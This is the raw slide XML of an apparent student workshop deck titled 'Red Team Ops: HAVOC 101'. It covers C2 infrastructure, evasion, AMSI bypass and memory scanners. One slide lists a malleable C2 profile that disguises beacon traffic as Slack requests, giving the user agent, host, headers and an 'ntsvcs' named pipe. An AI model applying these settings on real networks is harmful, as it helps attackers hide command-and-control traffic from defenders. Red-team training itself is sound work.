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sldIdLst>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="304" r:id="rId6"/>
    <p:sldId id="308" r:id="rId7"/>
    <p:sldId id="328" r:id="rId8"/>
    <p:sldId id="321" r:id="rId9"/>
    <p:sldId id="354" r:id="rId10"/>
    <p:sldId id="329" r:id="rId11"/>
    <p:sldId id="319" r:id="rId12"/>
    <p:sldId id="330" r:id="rId13"/>
    <p:sldId id="309" r:id="rId14"/>
    <p:sldId id="331" r:id="rId15"/>
    <p:sldId id="353" r:id="rId16"/>
    <p:sldId id="325" r:id="rId17"/>
    <p:sldId id="310" r:id="rId18"/>
    <p:sldId id="326" r:id="rId19"/>
    <p:sldId id="322" r:id="rId20"/>
    <p:sldId id="332" r:id="rId21"/>
    <p:sldId id="312" r:id="rId22"/>
    <p:sldId id="320" r:id="rId23"/>
    <p:sldId id="361" r:id="rId24"/>
    <p:sldId id="337" r:id="rId25"/>
    <p:sldId id="317" r:id="rId26"/>
    <p:sldId id="318" r:id="rId27"/>
    <p:sldId id="335" r:id="rId28"/>
    <p:sldId id="359" r:id="rId29"/>
    <p:sldId id="336" r:id="rId30"/>
    <p:sldId id="360" r:id="rId31"/>
    <p:sldId id="324" r:id="rId32"/>
    <p:sldId id="339" r:id="rId33"/>
    <p:sldId id="334" r:id="rId34"/>
    <p:sldId id="333" r:id="rId35"/>
    <p:sldId id="340" r:id="rId36"/>
    <p:sldId id="313" r:id="rId37"/>
    <p:sldId id="327" r:id="rId38"/>
    <p:sldId id="342" r:id="rId39"/>
    <p:sldId id="341" r:id="rId40"/>
    <p:sldId id="343" r:id="rId41"/>
    <p:sldId id="315" r:id="rId42"/>
    <p:sldId id="345" r:id="rId43"/>
    <p:sldId id="344" r:id="rId44"/>
    <p:sldId id="347" r:id="rId45"/>
    <p:sldId id="348" r:id="rId46"/>
    <p:sldId id="349" r:id="rId47"/>
    <p:sldId id="350" r:id="rId48"/>
    <p:sldId id="355" r:id="rId49"/>
    <p:sldId id="356" r:id="rId50"/>
    <p:sldId id="357" r:id="rId51"/>
    <p:sldId id="351" r:id="rId52"/>
    <p:sldId id="346" r:id="rId53"/>
    <p:sldId id="358" r:id="rId54"/>
    <p:sldId id="29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1216"/>
    <a:srgbClr val="7E0C0F"/>
    <a:srgbClr val="960C19"/>
    <a:srgbClr val="A50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B9CF6-50AA-4523-9F79-79AF9573D818}" v="310" dt="2023-02-24T16:18:41.722"/>
    <p1510:client id="{48548164-846B-45FC-8AB1-E23E5E8BC49C}" v="1122" dt="2023-02-24T16:12:59.951"/>
    <p1510:client id="{809F1978-6BD6-EB3D-0902-1CEBF23F0EB8}" v="139" dt="2023-02-24T02:18:57.644"/>
    <p1510:client id="{D7CB04FD-9216-5250-A179-38D1820CA657}" v="4" dt="2023-02-24T12:33:23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5DC03-30DB-40E8-BFA7-334C400AB270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BE976-1080-4D4C-9731-6F3953821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BE976-1080-4D4C-9731-6F39538213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1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E8A4-BA98-26C0-17B4-A5FAAA452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28DBA-12FD-C051-4E8D-3810C0014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2C7BE-9014-A0AB-CADE-C5B78BB2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05A6A-B355-BC01-AD18-22C80589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1411-4C9A-EDAB-5EAD-951BEA6D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7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C242-B254-49B6-12AD-F18E875C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CFC00-14D8-A99E-11B9-52056A40B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AE420-CA2F-CFAD-78D5-350CC96A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2A105-8097-C4CB-234C-CE0E2D91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CBEA8-E5D7-7135-4013-8304A844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0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388E0C-33C1-8D60-C75A-CEF12B177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E0FA8-3172-4448-7AEE-1F227BD3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833E-DE1C-99FC-7694-DC03551B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03AA8-AD57-35D1-3A40-2B90A623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5C794-1BA1-A018-910D-90887641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4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9A39-7F71-E2EE-ADDF-D6C0004C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A4E4-FEEF-7C9F-8778-A2CB3FD0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8E2F1-646C-C9D0-886E-F7D7C65F0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276C8-AEEA-37CE-C3B3-FF822926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DAE68-6D37-DD59-E9B6-193426A4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1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BE21-3B80-E530-5786-9D233AED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1780B-4CFA-2544-1FED-FE65C0EC6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306AC-2777-D91B-14C9-3DB3DA68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D3E94-8B5A-D5D9-0673-FA53B77D4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D3797-4A2C-F99B-20AB-5948D3A2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7096-A6E2-64C2-911B-38AE7FB6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2032-B99E-BB5B-E617-B09C1BDA2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61F51-9E8E-8CE1-8872-47565027A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05D09-8BC8-B5E7-3596-B7527C81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99109-445A-EE43-C80A-36A2AC28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B27FD-128A-B009-C420-06152826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7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C6C8-C1C7-47A0-A381-A2029F63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DBF7E-D441-6F52-C00D-AFC739473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D9592-E7B6-3BB4-A48E-32ABF2AD2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1E760-0C28-D939-3530-A08880C59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37297-CE27-7776-B015-A4AD5ADEE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36D3E-24B7-BFB2-BF2E-A59C79CE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A3C2C-385C-C11C-4190-5B7EFD2A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2FCEC-4007-AEA3-7162-13CCE038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7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75B1-9108-2D78-BB1F-BEB96256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31353-F7A6-E299-CCF1-F0C8FAE2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B34E3-CBA9-3EAE-A19B-2E843AAA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3EFBE-1B69-0FDA-B78E-6359CC35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6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A5703-B198-DD9E-A233-3000C9BD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44C44-0695-03C3-76F1-A4014F95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A0BA6-BD87-3929-1287-875CF491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9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3550-CCE4-EE78-74BA-896CEF79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67263-EE2C-2510-0EC8-2D4EFF46F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19204-848D-A35F-241A-A4EB9BC7C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688AA-9396-8484-E3BF-5C68C0ADA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A83A5-B7EE-37D0-834A-97D4A433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E6448-C2D2-55B5-899B-5FDB2119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4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072C-A4DF-C658-4A5C-1138059C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711B8-7C49-DB71-3FDA-4BFF3565E6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AF01E-B627-2040-E36A-A5A79F06E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EA632-BED2-7929-1CF4-40C459222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07BA-4910-2951-FF73-12702B36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D5DD7-59C5-24AB-6A05-14DB76F7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6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029A7-742E-D82C-EAB1-1FAA27DB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ABC9F-210B-6EB3-0563-4DC062D34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2109E-70BE-D151-1544-D9BB09EAC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07014-E6E7-4590-B38E-7F90738AEEB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A7D25-56FB-3B58-A7B9-9190F9E7D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B5FBF-9016-FB30-0157-33170AAC3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8A159-14E8-4C05-8320-4A00131EB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4.png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4.png"/><Relationship Id="rId9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4.png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4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12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56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4.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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4C79D889-0FDF-82D4-EE51-E8ADC4765D09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8017039" y="2782607"/>
            <a:ext cx="1657350" cy="1615044"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnector">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="BA12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8FCF1117-265A-3536-8E01-4EAC6AF489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43" y="5801993"/>
            <a:ext cx="729192" cy="729192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F37222AB-BB69-7ABB-775D-0208DD7FE22C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1516614" y="1205980"/>
            <a:ext cx="5238238" cy="2094163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>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="970"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="10">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>FSEC-SS February Workshop</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" spc="1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4800" spc="10">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Red Team Ops: HAVOC 101</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet M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D49DE28-DFDF-F94A-CA52-F02F50C293DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1516614" y="5122931"/>
            <a:ext cx="4755935" cy="345439"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4876165" h="518159">
                <a:moveTo>
                  <a:pt x="4616344" y="517914"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="259255" y="517914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212622" y="513745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168744" y="501726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128350" y="482585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92170" y="457050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60933" y="425849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35369" y="389711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16205" y="349364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4172" y="305536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="258957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4172" y="212377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16205" y="168549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35369" y="128202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60933" y="92064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92170" y="60863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128350" y="35328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168744" y="16187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212622" y="4168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259255" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4616344" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4662801" y="4168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4706547" y="16187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4717486" y="21381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259255" y="21381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211502" y="26205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166996" y="40035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126698" y="61911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91571" y="90872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62577" y="125958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40675" y="166209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26830" y="210664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22001" y="258363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26830" y="306061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40675" y="350516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62577" y="390767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91571" y="425853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126698" y="454815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166996" y="476691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211502" y="490521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259255" y="495344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4720325" y="495344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4706856" y="501726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4662978" y="513745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4616344" y="517914"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4876165" h="518159">
                <a:moveTo>
                  <a:pt x="4720325" y="495344"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4616344" y="495344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4664097" y="490521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4708604" y="476691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4748901" y="454815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4784031" y="425849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4813023" y="390767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4834924" y="350516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4848770" y="306061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4853599" y="258363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4848770" y="210664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4834924" y="166209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4813023" y="125958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4784028" y="90872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4748901" y="61911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4708604" y="40035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4664097" y="26205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4616344" y="21381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4717486" y="21381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4782989" y="60863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4814226" y="92064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4839834" y="128202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4859086" y="168549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4871251" y="212377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4875600" y="258957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4871427" y="305536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4859394" y="349364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4840231" y="389711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4814662" y="425853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4783429" y="457050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4747249" y="482585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4720325" y="495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48F0B77-C3C6-9162-748D-B48399AEB67B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1516614" y="4844834"/>
            <a:ext cx="4755935" cy="30479"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2085975" h="9525">
                <a:moveTo>
                  <a:pt x="2085974" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2085974" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20859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EFCBE9E-3284-F4A1-D941-97B3CED42657}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1516614" y="3715009"/>
            <a:ext cx="1927626" cy="94316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08800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="67"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" spc="37">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Wesley, David </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="8467" marR="3387">
              <a:lnSpc>
                <a:spcPct val="108800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="67"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" spc="60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Final Year Cyber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" spc="-27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400" spc="37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lang="en-US" sz="1400" spc="-23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1400" spc="23">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Student, Committee of FSEC-SS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" spc="-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endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS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11C87B46-3CBC-8000-644C-72EECB4D5DF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1516614" y="3268760"/>
            <a:ext cx="1385959" cy="370614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>
            <a:lvl1pPr>
              <a:defRPr sz="17100" b="0" i="1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8467" marR="3387">
              <a:lnSpc>
                <a:spcPct val="79800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="970"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="0" kern="0" spc="10">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Speakers:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" kern="0">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS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2D1BD17-EEE3-42F2-FAF0-4639160C03B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2472781" y="5234595"/>
            <a:ext cx="4029843" cy="126167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  <a:tabLst>
                <a:tab pos="1468193" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="767" spc="33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767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767" spc="-47">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> R  3  D    T   E  4  M  1  N  G    	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="767" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>#  C  Y  B  3  R  S  3  C  U  R  1  T  Y</a:t>
            </a:r>
            <a:endParaRPr sz="767">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS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416DC2FC-7C0D-58C2-4F9F-D4A89976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913" y="3184158"/>
            <a:ext cx="748156" cy="7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3DF4FCE7-7EF9-EDDA-9554-AAEB5DC1B45C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7599024" y="2378846"/>
            <a:ext cx="2486025" cy="2422566"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnector">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="BA12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2D9E6C75-A99C-8A2E-B99D-CE05C4051F43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7165512" y="1959969"/>
            <a:ext cx="3360404" cy="3274626"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnector">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="BA12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49C62544-61FF-73FD-0419-6E3BC439765E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6807354" y="1623405"/>
            <a:ext cx="4076720" cy="3972657"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnector">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="BA12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6" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67C9054C-BF0E-EECC-C4B7-DA75DB7D24F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7698" y="6056836"/>
            <a:ext cx="101519" cy="101519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C3EFB5C-5DBD-CDF7-30BB-A8886B41CDD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17617" y="5904356"/>
            <a:ext cx="101599" cy="101599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6859EF0C-EFF5-3115-17C8-682334211D1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7697" y="6209236"/>
            <a:ext cx="101519" cy="101519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29CB887B-6C41-43D8-2A51-AA0AA462C4A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7697" y="6361636"/>
            <a:ext cx="101519" cy="1015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4514D6-2073-55AC-F151-6DB889E19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958" y="3788046"/>
            <a:ext cx="4312497" cy="2612912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BFF809D-DB94-A7CA-44B1-CC830414383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4E6FBED-BA71-D246-437A-6EABCA4B7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5319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C2 Malleable Profile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FEF523E-F6EC-6C84-5D10-5E8DA0191C49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="939449" y="1090426"/>
            <a:ext cx="9526006" cy="4094711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970"/>
              </a:spcBef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Disguise beacon traffic as Slack application to hide communication indicators.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UserAgent</a:t>
            </a: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 = Slack/415620 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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CFNetwork</a:t>
            </a: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/1240.0.4 Darwin/20.5.0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Host: msdevchat.slack.com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X-Slack-Req-Id: 6319165c-f976-4d0666532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X-Via: haproxy-www-w6k7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X-Slack-Backend: h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Named Pipe: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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ntsvcs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" spc="10">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill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09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93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BFF809D-DB94-A7CA-44B1-CC830414383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4E6FBED-BA71-D246-437A-6EABCA4B7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6116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Other Named Pipes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C25088-4826-22FF-43F8-F7C99F98A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265" y="1078368"/>
            <a:ext cx="6998319" cy="54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5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93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BFF809D-DB94-A7CA-44B1-CC830414383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4E6FBED-BA71-D246-437A-6EABCA4B7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6116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69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</a:rPr>
              <a:t>Web Hook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/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09A6728F-2398-398E-7C96-6A2B5F2B0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546" y="1418939"/>
            <a:ext cx="7587785" cy="40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5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177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8FE740-9348-66A1-CE22-89DC1844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1" y="1142996"/>
            <a:ext cx="9550264" cy="51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A8A6060B-AB3C-BB03-49D8-4E9091F8561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8D9A579B-193C-FC55-C35C-F4CB4D8390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C2 Infrastructure Design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265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13375C46-E5B6-81C1-FA82-7E8D9D8A9A8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1877884" y="2609109"/>
            <a:ext cx="8244832" cy="134481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8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let’s take a break</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8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87AC306-60E0-45FF-35AE-050B30F0334F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7903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6EA4A7B8-A3B8-6FEC-851A-F602E36DD029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Google Shape;162;p38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6D1B5CE-6A28-24C9-C466-3226B88FB2D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2848533" y="2599029"/>
            <a:ext cx="5788121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CHAPTER 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;164;p38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{673C25EE-D214-A123-6D15-6FDF4EF0A6DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3343923" y="4586164"/>
            <a:ext cx="468021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5400" ker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OPSEC &amp; EVASION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Google Shape;165;p38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{927691D9-2DA4-3D45-E7D3-B7FC18C60912}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3103061" y="3167954"/>
            <a:ext cx="5409708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33834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 b="1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D7F9A9A-B85F-4CFA-D650-B28041546AB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B3113923-F4DB-4E49-EA51-FC8EC1F13E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Anti Malware Scanning Interface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7C7D3-6997-6ED2-1A69-D26A7C61C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86" y="2083992"/>
            <a:ext cx="7774150" cy="4335062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="AMSI Bypass Methods | Pentest Laboratories">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{253BA848-205F-BF7D-D9F1-13B989911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" b="47408"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3316966" y="954346"/>
            <a:ext cx="7301874" cy="24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17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0FC77-E55B-520B-8EAD-73C8B6C63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11" y="960792"/>
            <a:ext cx="9856243" cy="5520652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D7F9A9A-B85F-4CFA-D650-B28041546AB4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B3113923-F4DB-4E49-EA51-FC8EC1F13E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Memory Scanner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0489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2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D33BFF-7EE0-32F1-D4D4-C3E5AE7724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50"/>
          <a:stretch/>
        </p:blipFill>
